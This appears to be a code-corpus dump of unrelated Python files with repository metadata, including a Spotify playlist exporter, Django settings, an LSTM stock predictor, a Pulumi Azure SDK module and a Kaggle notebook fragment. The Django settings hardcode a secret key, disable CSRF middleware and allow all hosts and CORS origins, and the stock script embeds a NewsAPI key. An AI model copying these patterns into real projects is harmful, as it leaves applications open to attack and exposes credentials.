self.id = id
def __str__(self):
return self.id + " - " + self.display_name
class Fetcher:
def __init__(self):
self.pages = {
'get_user_playlists': "https://api.spotify.com/v1/users/%s/playlists",
'get_current_user': "https://api.spotify.com/v1/me",
'get_playlist_tracks': "https://api.spotify.com/v1/users/%s/playlists/%s/tracks",
'get_tracks_features': "https://api.spotify.com/v1/audio-features"
}
self.oauth_token = self.get_oauth()
self.headers = {'Authorization': 'Bearer '+self.oauth_token}
def get_oauth(self) -> str:
with open('oauth.txt', 'r') as f:
return f.read()
def fetch_page(self, url: str) -> str:
with requests.Session() as session:
response = session.get(url, headers=self.headers)
return str(response.text)
def fetch_json(self, url: str) -> dict:
return json.loads(self.fetch_page(url))
def fetch_api(self, api_call: str, params: list=[], optionals: dict={}) -> dict:
url = self.pages[api_call] % tuple(params)
if optionals:
url += "?"
for key, value in optionals.items():
url += key+"="+str(value)+"&"
return self.fetch_json(url)
class SqliteExport:
def __init__(self, fname: str):
self.con = sqlite3.connect(fname)
self.cur = self.con.cursor()
def delete(self):
self.con.execute('DELETE FROM piosenki;')
self.con.commit()
def close(self):
self.con.commit()
self.con.close()
def export(self, d: list):
dict_model = [
'id', 'title', 'danceability', 'energy', 'key', 'loudness', 'mode', 'speechiness', 'acousticness',
'instrumentalness', 'liveness', 'valence', 'tempo', 'duration_ms'
]
#self.cur.execute( # uncomment on first launch
# "CREATE TABLE piosenki ("+', '.join(dict_model)+");")
query = "INSERT INTO piosenki ("+', '.join(dict_model)+") VALUES ("+', '.join(['?']*len(dict_model))+");"
self.cur.executemany(query, d)
class Parser:
def p_playlists(self, json_dict: dict) -> list:
playlists = []
for p in json_dict['items']:
playlists.append(Playlist(p['name'], p['id'], p['owner']['id']))
return playlists
def p_user(self, json_dict: dict) -> object:
return User(json_dict['display_name'], json_dict['id'])
def ids_from_playlist(self, json_dict: dict) -> dict:
ids = {}
for song in json_dict['items']:
ids[song['track']['id']] = song['track']['album']['artists'][0]['name']+" - "+song['track']['name']
return ids
prsr = Parser()
ftch = Fetcher()
"""
0nctmSV1j6bc6CJBpOCEVz - 1191584733 - Dopracowane pereลki
7sP34VAMpoB9IDY6Hw1C4J - 1191584733 - Imprezowe
6P7FpSCVS0788uHO2QaasY - 1191584733 - Dobra muzyka - po prostu.
3NvqgfDX4gnjo8MHUwKuSP - 1191584733 - Rock, ew. metal
5hU005cVJ6YxukoH0aWCyK - 1191584733 - Polskie, gลรณwnie pop
0ASbkhRRPIcEMc6eMFoyQT - 1191584733 - House/trance/itp
4jxLNcEcXo3pAyGzMxQYV8 - 1191584733 - Rap
"""
user_id = prsr.p_user(ftch.fetch_api('get_current_user')).id
plays = prsr.p_playlists(ftch.fetch_api('get_user_playlists', [user_id]))
for p in plays:
print(p)
ids_list_one = prsr.ids_from_playlist(
ftch.fetch_api('get_playlist_tracks',
[user_id, '4jxLNcEcXo3pAyGzMxQYV8'],
{'offset': 0}))
ids_list_two = prsr.ids_from_playlist(
ftch.fetch_api('get_playlist_tracks',
[user_id, '4jxLNcEcXo3pAyGzMxQYV8'],
{'offset': 100}))
ids_list = {**ids_list_one, **ids_list_two}
cool_ids = ','.join(list(ids_list.keys())[:100])
cool_ids2 = ','.join(list(ids_list.keys())[100:-1])
csv_list = [[
'id', 'title', 'danceability', 'energy', 'key', 'loudness', 'mode', 'speechiness', 'acousticness',
'instrumentalness', 'liveness', 'valence', 'tempo', 'duration_ms'
]]
for x in (cool_ids, cool_ids2):
xD = ftch.fetch_api('get_tracks_features', optionals={'ids':x})
for i in xD['audio_features']:
csv_list.append([
i['id'], ids_list[i['id']], i['danceability'], i['energy'], i['key'], i['loudness'], i['mode'],
i['speechiness'], i['acousticness'], i['instrumentalness'], i['liveness'], i['valence'],
i['tempo'], i['duration_ms']
])
sq = SqliteExport('piosenki.db')
sq.delete()
sq.export(csv_list[1:])
sq.close()
print(csv_list)
| [
"maciej.kaszkowiak@gmail.com"
] | maciej.kaszkowiak@gmail.com |
5a4a2020d8ce189068d89b8f22fae33cdb7961ef | 9a2fbca24f00e28cb3c68ea52c0999970bf628b2 | /backend/mysite/mysite/settings.py | 68e777ef01650f2c936710f21ebc06a7773f25d6 | [] | no_license | yashikacac/DJ-DayStrom | 47a568ec2af8e172d9f9269039b485043b198794 | b50a63994e982c9fce3b8be9e289fe63f1836ddb | refs/heads/master | 2022-12-11T08:58:25.782043 | 2020-09-20T05:10:24 | 2020-09-20T05:10:24 | 296,817,808 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,208 | py | """
Django settings for mysite project.
Generated by 'django-admin startproject' using Django 3.1.1.
For more information on this file, see
https://docs.djangoproject.com/en/3.1/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/3.1/ref/settings/
"""
from pathlib import Path
# Build paths inside the project like this: BASE_DIR / 'subdir'.
BASE_DIR = Path(__file__).resolve().parent.parent
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/3.1/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = 'x0c8_*w)&(^=l_=*e#$lz_qeywvquk73ag^$k74_id*j8sa2x0'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = ['*']
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'corsheaders',
'app',
'users',
'django.contrib.staticfiles',
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'corsheaders.middleware.CorsMiddleware',
'django.middleware.common.CommonMiddleware',
# 'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'mysite.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'mysite.wsgi.application'
# Database
# https://docs.djangoproject.com/en/3.1/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': BASE_DIR / 'db.sqlite3',
}
}
# Password validation
# https://docs.djangoproject.com/en/3.1/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/3.1/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/3.1/howto/static-files/
STATIC_URL = '/static/'
MEDIA_URL = '/media/'
CORS_ALLOW_ALL_ORIGINS = True
| [
"dewanshrawat15@gmail.com"
] | dewanshrawat15@gmail.com |
1cf91c973076f5cd1c46e4f58e68999f1a89e80d | a2f67003e0eededb0c2d7645d83243d19af71340 | /exam_subject/Subject/apps/topic/migrations/0010_answer_analysis.py | 117680a8d906da18fcca8540dbfdcda5856ebd05 | [] | no_license | john123951/SubjectSystem | c6bf118627aa54ba56bd367f73528e66f51dcd58 | a7f8e6014f81ec4376f3c5f437a280e801ab22e4 | refs/heads/master | 2020-07-13T16:36:15.663952 | 2019-06-19T07:02:14 | 2019-06-19T07:02:14 | 205,115,935 | 7 | 0 | null | 2019-08-29T08:23:00 | 2019-08-29T08:22:59 | null | UTF-8 | Python | false | false | 422 | py | # Generated by Django 2.0.2 on 2019-05-05 22:15
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('topic', '0009_examtime_exam_number'),
]
operations = [
migrations.AddField(
model_name='answer',
name='analysis',
field=models.CharField(default='', max_length=500, verbose_name='่งฃๆ'),
),
]
| [
"you@example.com"
] | you@example.com |
44b3b47ff12130c5430ed3f41a26362427382fac | 3f21a05258ccee066f1a6758089b41ed0ba6ce88 | /33. urllibtutorialvid.py | a41f50965404371538fe24d835665967b90c4079 | [
"MIT"
] | permissive | JatinR05/Python-3-basics-series | 1ad4def14df5b735efc8ece3c33570fe2eebb6fc | e4b3d8056e2074602c9ed0cd201676484dd0d179 | refs/heads/master | 2022-12-09T11:30:53.043250 | 2020-09-30T17:05:16 | 2020-09-30T17:05:16 | 299,991,764 | 0 | 0 | MIT | 2020-09-30T17:03:13 | 2020-09-30T17:03:13 | null | UTF-8 | Python | false | false | 1,018 | py |
import urllib.request
import urllib.parse
#x = urllib.request.urlopen('https://www.google.com')
#print(x.read())
'''
url = 'http://pythonprogramming.net'
values = {'s':'basic',
'submit':'search'}
data = urllib.parse.urlencode(values)
data = data.encode('utf-8')
req = urllib.request.Request(url,data)
resp = urllib.request.urlopen(req)
respData = resp.read()
print(respData)
'''
try:
x = urllib.request.urlopen('https://www.google.com/search?q=test')
print(x.read())
except Exception as e:
print(str(e))
try:
url = 'https://www.google.com/search?q=test'
headers = {}
headers['User-Agent'] = 'Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.17 (KHTML, like Gecko) Chrome/24.0.1312.27 Safari/537.17'
req = urllib.request.Request(url, headers=headers)
resp = urllib.request.urlopen(req)
respData = resp.read()
saveFile = open('withHeaders.txt','w')
saveFile.write(str(respData))
saveFile.close()
except Exception as e:
print(str(e))
| [
"harrison@sentdex.com"
] | harrison@sentdex.com |
b7a5aac51b6dbc6469dca15ebc3fba5e91728859 | ee348632cc65d0e77d7b8709f600667d27565e6a | /stockacm.py | 2f21aca35fb6d6feb6e4821462ee0c794e1d1c8f | [
"MIT"
] | permissive | KhondokerTanvirHossain/stock-market-exchange-prediction | b2247cd3fc51b61e705ee8a9d0aa80b59b6cef0a | 9cd2e9c94b38692473d4113ecbad96e3408fbeb1 | refs/heads/master | 2020-06-04T15:42:49.221830 | 2019-06-15T21:06:21 | 2019-06-15T21:06:21 | 192,086,932 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,221 | py | import numpy as np
import matplotlib.pyplot as plt
import pandas as pd
from sklearn.preprocessing import MinMaxScaler
from keras.models import Sequential
from keras.layers import Dense
from keras.layers import LSTM
from keras.layers import Dropout
from keras.models import model_from_json
import math
from sklearn.metrics import mean_squared_error
import requests
from textblob import TextBlob
#dataset_main = pd.read_csv('Google_Stock_Price_Train.csv')
#dataset = dataset_main.iloc[0:1259, 1:2].values
file = open("Stocks/acm.us.txt", "r")
dataset = [[]]
count = 0
for line in file:
tokens = line.split(',')
array = [0]
if count > 0 :
array[0] = float(tokens[1])
dataset.insert(count,array)
count = count + 1
#print (count)
dataset.pop(0)
#print (dataset)
sc = MinMaxScaler(feature_range = (0, 1))
dataset_scaled = sc.fit_transform(dataset)
def train():
#training_set = dataset.iloc[0:4001, 2:3].values
#training_set_scaled = sc.fit_transform(training_set)
plt.plot(dataset, color = 'blue', label = 'Price')
plt.title('Price')
plt.xlabel('Time')
plt.ylabel('Price')
plt.legend()
plt.show()
X_train = []
y_train = []
X_train = dataset_scaled[0:2500]
y_train = dataset_scaled[1:2501]
plt.plot(X_train, color = 'red', label = 'Scaled Price')
plt.title('Scaled Price')
plt.xlabel('Time')
plt.ylabel('Price')
plt.legend()
plt.show()
X_train, y_train = np.array(X_train), np.array(y_train)
X_train = np.reshape(X_train, (X_train.shape[0], X_train.shape[1], 1))
regressor = Sequential()
regressor.add(LSTM(units = 4, activation = 'sigmoid', input_shape = (None, 1)))
regressor.add(Dense(units = 1))
regressor.compile(optimizer = 'adam', loss = 'mean_squared_error')
regressor.fit(X_train, y_train, epochs = 200, batch_size = 32)
model_json = regressor.to_json()
with open("modelTempantm.json", "w") as json_file:
json_file.write(model_json)
regressor.save_weights("modelTempantm.h5")
print("Saved model to disk")
def load():
test_set = dataset[2501:2600]
#test_set_scaled = sc.transform(test_set)
test_set_scaled = dataset_scaled[2501:2600]
json_file = open('modelTempantm.json', 'r')
loaded_model_json = json_file.read()
json_file.close()
loaded_model = model_from_json(loaded_model_json)
# load weights into new model
loaded_model.load_weights("modelTempantm.h5")
print("Loaded model from disk")
test_set_reshaped = np.reshape(test_set_scaled, (test_set_scaled.shape[0], test_set_scaled.shape[1], 1))
predicted_temprature = loaded_model.predict(test_set_reshaped)
predicted_temprature = sc.inverse_transform(predicted_temprature)
fig_size = plt.rcParams["figure.figsize"]
fig_size[0] = 12
fig_size[1] = 5
plt.rcParams["figure.figsize"] = fig_size
plt.plot(predicted_temprature, color = 'blue', label = 'Predicted Price')
plt.plot(test_set, color = 'red', label = 'Real Price')
plt.title('Price Prediction')
plt.xlabel('Time')
plt.ylabel('Price')
plt.legend()
plt.show()
rmse = math.sqrt(mean_squared_error(test_set, predicted_temprature)) / 10
print (rmse)
def prediction():
#test_set = dataset_main.iloc[4001:4101, 2:3].values
#test_set_scaled = sc.transform(test_set)
test_set_scaled = dataset_scaled[2600:2610]
json_file = open('modelTempantm.json', 'r')
loaded_model_json = json_file.read()
json_file.close()
loaded_model = model_from_json(loaded_model_json)
# load weights into new model
loaded_model.load_weights("modelTempantm.h5")
test_set_reshaped = np.reshape(test_set_scaled, (test_set_scaled.shape[0], test_set_scaled.shape[1], 1))
predicted_temprature = loaded_model.predict(test_set_reshaped)
predicted_temprature = sc.inverse_transform(predicted_temprature)
#print(predicted_temprature)
return predicted_temprature
def senti():
url = ('https://newsapi.org/v2/everything?q=%20acm%20stock%20market&apiKey=6e593f373865401e803d6874594f9063')
response = requests.get(url)
#print (response.json())
parsed_json = response.json()
#print(parsed_json['status'])
array = parsed_json['articles']
polarity = 0.0;
count = 0;
for i in array:
#print(i['description'])
blob = TextBlob(i['description'])
count = count + 1
polarity = polarity + blob.sentiment.polarity
polarity = polarity / count
#print(polarity)
return polarity
def run():
print('Prediction of acm Stock Price in Next 10 Days :')
p = prediction()
s = senti()
print("Date Price")
d = 10
m = 1
y = 2019
for i in range(0,9):
if (d == 31):
d = 1;
m += 1;
if (m == 13):
m = 1;
print(str(d) + "-" + str(m) + "-"+ str(y)+": "+ str(p[i][0]))
d += 1
print('news polarity : ' + str(s))
if s > 0.5 :
print('User Demand Is Very High')
elif s > 0:
print('User Demand Is High')
elif s < -0.5:
print('User Demand Is Very Low')
elif s < 0:
print('User Demand IS Low')
| [
"k.tanvir.hossain@gmail.com"
] | k.tanvir.hossain@gmail.com |
c5708367337a0c64f2df12dcce951050022001b6 | 2af1e6357f51d0d08b1a991e2bd922b7bdc8c0b6 | /baekjoon/accepted/15480 LCA์ ์ฟผ๋ฆฌ.py | 8220d3407e8cfb7390cba36119d50b67d795abeb | [] | no_license | grasshopperTrainer/coding_practice | 530e9912b10952c866d35d69f12c99b96959a22d | d1e5e6d6fa3f71f1a0105940fff1785068aec8b0 | refs/heads/master | 2023-06-01T13:30:15.362657 | 2021-06-08T08:40:15 | 2021-06-08T08:40:15 | 267,359,225 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,998 | py | # not accepted
from sys import stdin
from collections import deque
def solution(N, edges, asked):
nd_tree = {}
for a, b in edges:
nd_tree.setdefault(a, []).append(b)
nd_tree.setdefault(b, []).append(a)
answers = []
for root, a, b in asked:
# find directed tree and depth
tree = [i for i in range(N+1)]
node_depth = [0 for _ in range(N+1)]
max_depth = 0
que = deque([[root,0]])
visited = {root}
while que:
at, depth = que.popleft()
max_depth = max((max_depth, depth))
for goto in nd_tree[at]:
if goto not in visited:
visited.add(goto)
tree[goto] = at
node_depth[goto] = depth+1
que.append((goto, depth+1))
# build ancestor table
ancestry_d = len(bin(max_depth)[2:])+1
lca = [[root for _ in range(ancestry_d)] for _ in range(N+1)]
for node in range(1, N+1):
for anc in range(ancestry_d):
if anc == 0:
lca[node][anc] = tree[node]
else:
lca[node][anc] = lca[lca[node][anc-1]][anc-1]
# search asked
while node_depth[a] != node_depth[b]:
if node_depth[a] > node_depth[b]:
a = tree[a]
else:
b = tree[b]
while a != b:
anc = 0
print(a, b, anc, lca[a], lca[b], lca[a][anc+1], lca[b][anc+1])
while lca[a][anc+1] != lca[b][anc+1]:
anc += 1
a, b = lca[a][anc], lca[b][anc]
answers.append(a)
return answers
N = int(stdin.readline())
edges = []
for _ in range(N-1):
edges.append([int(c) for c in stdin.readline().strip().split(' ')])
M = int(stdin.readline())
asked = []
for _ in range(M):
asked.append([int(c) for c in stdin.readline().strip().split(' ')])
for a in solution(N, edges, asked):
print(a)
| [
"grasshoppertrainer@gmail.com"
] | grasshoppertrainer@gmail.com |
6e8ca6ecd6885f3d1ee5325ac3f14d28d72a062b | c4f25e2a5b444492e86b4f1523e930a1ec780c49 | /character/names/__init__.py | 9987b708059225b3efdea6d5c4c58428cff5df38 | [] | no_license | steliosph/stevooLand | 155b8d64d0bbbf829050a006224586d39baed9d3 | 2c86c6f01df1c8e1d59db1fc1d619071d7607737 | refs/heads/master | 2019-08-06T22:35:08.776479 | 2017-10-01T10:38:12 | 2017-10-01T10:38:12 | 105,182,951 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 983 | py | from __future__ import unicode_literals
from os.path import abspath, join, dirname
import random
__title__ = 'names'
__version__ = '0.3.0.post1'
__author__ = 'Trey Hunner'
__license__ = 'MIT'
full_path = lambda filename: abspath(join(dirname(__file__), filename))
FILES = {
'first:male': full_path('dist.male.first'),
'first:female': full_path('dist.female.first'),
}
def __get_name(filename):
selected = random.random() * 90
with open(filename) as name_file:
for line in name_file:
name, _, cummulative, _ = line.split()
if float(cummulative) > selected:
return name
return "" # Return empty string if file is empty
def get_first_name(gender=None):
if gender is None:
gender = random.choice(('male', 'female'))
if gender not in ('male', 'female'):
raise ValueError("Only 'male' and 'female' are supported as gender")
return __get_name(FILES['first:%s' % gender]).capitalize() | [
"stevoo82@gmail.com"
] | stevoo82@gmail.com |
6a3307afb49fd8cb535570b49aaeafc631f3394b | 90419da201cd4948a27d3612f0b482c68026c96f | /sdk/python/pulumi_azure_nextgen/network/v20170301/get_endpoint.py | 7e85c2b2da6288d9cba3d474eec4981e754e7d0c | [
"BSD-3-Clause",
"Apache-2.0"
] | permissive | test-wiz-sec/pulumi-azure-nextgen | cd4bee5d70cb0d332c04f16bb54e17d016d2adaf | 20a695af0d020b34b0f1c336e1b69702755174cc | refs/heads/master | 2023-06-08T02:35:52.639773 | 2020-11-06T22:39:06 | 2020-11-06T22:39:06 | 312,993,761 | 0 | 0 | Apache-2.0 | 2023-06-02T06:47:28 | 2020-11-15T09:04:00 | null | UTF-8 | Python | false | false | 8,850 | py | # coding=utf-8
# *** WARNING: this file was generated by the Pulumi SDK Generator. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union
from ... import _utilities, _tables
__all__ = [
'GetEndpointResult',
'AwaitableGetEndpointResult',
'get_endpoint',
]
@pulumi.output_type
class GetEndpointResult:
"""
Class representing a Traffic Manager endpoint.
"""
def __init__(__self__, endpoint_location=None, endpoint_monitor_status=None, endpoint_status=None, geo_mapping=None, min_child_endpoints=None, name=None, priority=None, target=None, target_resource_id=None, type=None, weight=None):
if endpoint_location and not isinstance(endpoint_location, str):
raise TypeError("Expected argument 'endpoint_location' to be a str")
pulumi.set(__self__, "endpoint_location", endpoint_location)
if endpoint_monitor_status and not isinstance(endpoint_monitor_status, str):
raise TypeError("Expected argument 'endpoint_monitor_status' to be a str")
pulumi.set(__self__, "endpoint_monitor_status", endpoint_monitor_status)
if endpoint_status and not isinstance(endpoint_status, str):
raise TypeError("Expected argument 'endpoint_status' to be a str")
pulumi.set(__self__, "endpoint_status", endpoint_status)
if geo_mapping and not isinstance(geo_mapping, list):
raise TypeError("Expected argument 'geo_mapping' to be a list")
pulumi.set(__self__, "geo_mapping", geo_mapping)
if min_child_endpoints and not isinstance(min_child_endpoints, int):
raise TypeError("Expected argument 'min_child_endpoints' to be a int")
pulumi.set(__self__, "min_child_endpoints", min_child_endpoints)
if name and not isinstance(name, str):
raise TypeError("Expected argument 'name' to be a str")
pulumi.set(__self__, "name", name)
if priority and not isinstance(priority, int):
raise TypeError("Expected argument 'priority' to be a int")
pulumi.set(__self__, "priority", priority)
if target and not isinstance(target, str):
raise TypeError("Expected argument 'target' to be a str")
pulumi.set(__self__, "target", target)
if target_resource_id and not isinstance(target_resource_id, str):
raise TypeError("Expected argument 'target_resource_id' to be a str")
pulumi.set(__self__, "target_resource_id", target_resource_id)
if type and not isinstance(type, str):
raise TypeError("Expected argument 'type' to be a str")
pulumi.set(__self__, "type", type)
if weight and not isinstance(weight, int):
raise TypeError("Expected argument 'weight' to be a int")
pulumi.set(__self__, "weight", weight)
@property
@pulumi.getter(name="endpointLocation")
def endpoint_location(self) -> Optional[str]:
"""
Specifies the location of the external or nested endpoints when using the โPerformanceโ traffic routing method.
"""
return pulumi.get(self, "endpoint_location")
@property
@pulumi.getter(name="endpointMonitorStatus")
def endpoint_monitor_status(self) -> Optional[str]:
"""
Gets or sets the monitoring status of the endpoint.
"""
return pulumi.get(self, "endpoint_monitor_status")
@property
@pulumi.getter(name="endpointStatus")
def endpoint_status(self) -> Optional[str]:
"""
Gets or sets the status of the endpoint.. If the endpoint is Enabled, it is probed for endpoint health and is included in the traffic routing method. Possible values are 'Enabled' and 'Disabled'.
"""
return pulumi.get(self, "endpoint_status")
@property
@pulumi.getter(name="geoMapping")
def geo_mapping(self) -> Optional[Sequence[str]]:
"""
Gets or sets the list of countries/regions mapped to this endpoint when using the โGeographicโ traffic routing method. Please consult Traffic Manager Geographic documentation for a full list of accepted values.
"""
return pulumi.get(self, "geo_mapping")
@property
@pulumi.getter(name="minChildEndpoints")
def min_child_endpoints(self) -> Optional[int]:
"""
Gets or sets the minimum number of endpoints that must be available in the child profile in order for the parent profile to be considered available. Only applicable to endpoint of type 'NestedEndpoints'.
"""
return pulumi.get(self, "min_child_endpoints")
@property
@pulumi.getter
def name(self) -> Optional[str]:
"""
Gets or sets the name of the Traffic Manager endpoint.
"""
return pulumi.get(self, "name")
@property
@pulumi.getter
def priority(self) -> Optional[int]:
"""
Gets or sets the priority of this endpoint when using the โPriorityโ traffic routing method. Possible values are from 1 to 1000, lower values represent higher priority. This is an optional parameter. If specified, it must be specified on all endpoints, and no two endpoints can share the same priority value.
"""
return pulumi.get(self, "priority")
@property
@pulumi.getter
def target(self) -> Optional[str]:
"""
Gets or sets the fully-qualified DNS name of the endpoint. Traffic Manager returns this value in DNS responses to direct traffic to this endpoint.
"""
return pulumi.get(self, "target")
@property
@pulumi.getter(name="targetResourceId")
def target_resource_id(self) -> Optional[str]:
"""
Gets or sets the Azure Resource URI of the of the endpoint. Not applicable to endpoints of type 'ExternalEndpoints'.
"""
return pulumi.get(self, "target_resource_id")
@property
@pulumi.getter
def type(self) -> Optional[str]:
"""
Gets or sets the endpoint type of the Traffic Manager endpoint.
"""
return pulumi.get(self, "type")
@property
@pulumi.getter
def weight(self) -> Optional[int]:
"""
Gets or sets the weight of this endpoint when using the 'Weighted' traffic routing method. Possible values are from 1 to 1000.
"""
return pulumi.get(self, "weight")
class AwaitableGetEndpointResult(GetEndpointResult):
# pylint: disable=using-constant-test
def __await__(self):
if False:
yield self
return GetEndpointResult(
endpoint_location=self.endpoint_location,
endpoint_monitor_status=self.endpoint_monitor_status,
endpoint_status=self.endpoint_status,
geo_mapping=self.geo_mapping,
min_child_endpoints=self.min_child_endpoints,
name=self.name,
priority=self.priority,
target=self.target,
target_resource_id=self.target_resource_id,
type=self.type,
weight=self.weight)
def get_endpoint(endpoint_name: Optional[str] = None,
endpoint_type: Optional[str] = None,
profile_name: Optional[str] = None,
resource_group_name: Optional[str] = None,
opts: Optional[pulumi.InvokeOptions] = None) -> AwaitableGetEndpointResult:
"""
Use this data source to access information about an existing resource.
:param str endpoint_name: The name of the Traffic Manager endpoint.
:param str endpoint_type: The type of the Traffic Manager endpoint.
:param str profile_name: The name of the Traffic Manager profile.
:param str resource_group_name: The name of the resource group containing the Traffic Manager endpoint.
"""
__args__ = dict()
__args__['endpointName'] = endpoint_name
__args__['endpointType'] = endpoint_type
__args__['profileName'] = profile_name
__args__['resourceGroupName'] = resource_group_name
if opts is None:
opts = pulumi.InvokeOptions()
if opts.version is None:
opts.version = _utilities.get_version()
__ret__ = pulumi.runtime.invoke('azure-nextgen:network/v20170301:getEndpoint', __args__, opts=opts, typ=GetEndpointResult).value
return AwaitableGetEndpointResult(
endpoint_location=__ret__.endpoint_location,
endpoint_monitor_status=__ret__.endpoint_monitor_status,
endpoint_status=__ret__.endpoint_status,
geo_mapping=__ret__.geo_mapping,
min_child_endpoints=__ret__.min_child_endpoints,
name=__ret__.name,
priority=__ret__.priority,
target=__ret__.target,
target_resource_id=__ret__.target_resource_id,
type=__ret__.type,
weight=__ret__.weight)
| [
"public@paulstack.co.uk"
] | public@paulstack.co.uk |
b4b1689cbc5129bc32113f9e26db59be3cc3da36 | 6b420371022986d850a8f8d88fc853aa5ca0ad9b | /modules/filenamegen.py | 4087919e00d45f89d4ac81b998279ee0010201d1 | [] | no_license | jiamh2005/persons | 7d4a1c5b2dc33309afa2b68cb8063d3319945f7c | 1a90bf616174cf32b116998d10eb285ec3639040 | refs/heads/master | 2021-04-03T07:41:14.099193 | 2018-03-28T13:09:51 | 2018-03-28T13:09:51 | 124,366,042 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,036 | py | #!/usr/bin/python
# -*- coding: utf-8 -*-
import os
import time
import random
x="AaBbCcDdEeFfGgHhIiJjKkLlMmNnOoPpQqRrSsTtUuVvWwXxYyZz0123456789"
#ๆญคๅฝๆฐ็ไฝ็จไธบ็ๆnumberไฝไธ้ๅค็้ๆบๅญ็ฌฆไธฒ๏ผnumberๆๅคงไธบ62
def singlerandom(number):
stringy=''.join(random.sample(x,number)).replace(' ','')
return stringy
def nsfile(s):
'''The number of new expected documents'''
nsfiles = []
#็ๆๆไปถๅ
for i in range(1,s+1):
localTime = time.strftime("%Y%m%d%H%M%S",time.localtime())
localNum = singlerandom(6)
#print localtime
filename = localTime + localNum
nsfiles.append(filename)
return nsfiles
def file_extension(path):
return os.path.splitext(path)[1]
def file_dir(path):
path = path.replace("\\","/")
return os.path.split(path)[0]
def file_name(path):
filename = os.path.split(path)[1]
return os.path.splitext(filename)[0]
if __name__ == '__main__':
s = input("Please input number of files:")
print nsfile(s)
| [
"jia@jiamh.cc"
] | jia@jiamh.cc |
92b960bbcd5dbc151aed6c4a93722c1f83d4615b | 59da6bb7222335e96bcaf2acce4e94bb28064f90 | /0x06-python-classes/101-square.py | 6cfde765ab9f73e7db6d6edcfffdb344f740536a | [] | no_license | cmdelcarmen/holbertonschool-higher_level_programming | 249fa4c5447f5fb88c81ba362a8cf45a01a65d39 | d8dd707559dacabf93453233861bef7c2f54d184 | refs/heads/main | 2023-08-19T07:39:51.777899 | 2021-09-23T01:27:28 | 2021-09-23T01:27:28 | 361,834,373 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 734 | py | #!/usr/bin/python3
class Square:
''' class square'''
def __init__(self, size=0, position=(0, 0)):
'''init'''
self.__size = size
self.__position = position
@property
def size(self):
'''property size'''
return self.__size
@size.setter
def size(self, value):
'''size.setter'''
self.__size = value
@property
def position(self):
'''property position'''
return self.__position
@position.setter
def position(self, value):
''' position.setter'''
self.__position = value
def area(self):
'''calcs area'''
return self.__size ** 2
def my_print(self):
'''prints'''
pass
| [
"delcarmencaroline@gmail.com"
] | delcarmencaroline@gmail.com |
e048837fa12f55157f9452e0736edb9ff1bd7cf7 | eeb7e70b0b68decbdcb32682351e54e0be99a5b0 | /kaggle/python_files/sample904.py | 82ab437aca033f7a777414cf29125f255fb92898 | [] | no_license | SocioProphet/CodeGraph | 8bafd7f03204f20da8f54ab23b04f3844e6d24de | 215ac4d16d21d07e87964fe9a97a5bf36f4c7d64 | refs/heads/master | 2023-02-16T02:51:27.791886 | 2021-01-15T07:00:41 | 2021-01-15T07:00:41 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 12,371 | py | #!/usr/bin/env python
# coding: utf-8
# **Notebook Objective:**
#
# Objective of the notebook is to look at the different pretrained embeddings provided in the dataset and to see how they are useful in the model building process.
#
# First let us import the necessary modules and read the input data.
# In[ ]:
import os
import time
import numpy as np # linear algebra
import pandas as pd # data processing, CSV file I/O (e.g. pd.read_csv)
from tqdm import tqdm
import math
from sklearn.model_selection import train_test_split
from sklearn import metrics
from keras.preprocessing.text import Tokenizer
from keras.preprocessing.sequence import pad_sequences
from keras.layers import Dense, Input, LSTM, Embedding, Dropout, Activation, CuDNNGRU, Conv1D
from keras.layers import Bidirectional, GlobalMaxPool1D
from keras.models import Model
from keras import initializers, regularizers, constraints, optimizers, layers
# In[ ]:
train_df = pd.read_csv("../input/train.csv")
test_df = pd.read_csv("../input/test.csv")
print("Train shape : ",train_df.shape)
print("Test shape : ",test_df.shape)
# Next steps are as follows:
# * Split the training dataset into train and val sample. Cross validation is a time consuming process and so let us do simple train val split.
# * Fill up the missing values in the text column with '_na_'
# * Tokenize the text column and convert them to vector sequences
# * Pad the sequence as needed - if the number of words in the text is greater than 'max_len' trunacate them to 'max_len' or if the number of words in the text is lesser than 'max_len' add zeros for remaining values.
# In[ ]:
## split to train and val
train_df, val_df = train_test_split(train_df, test_size=0.1, random_state=2018)
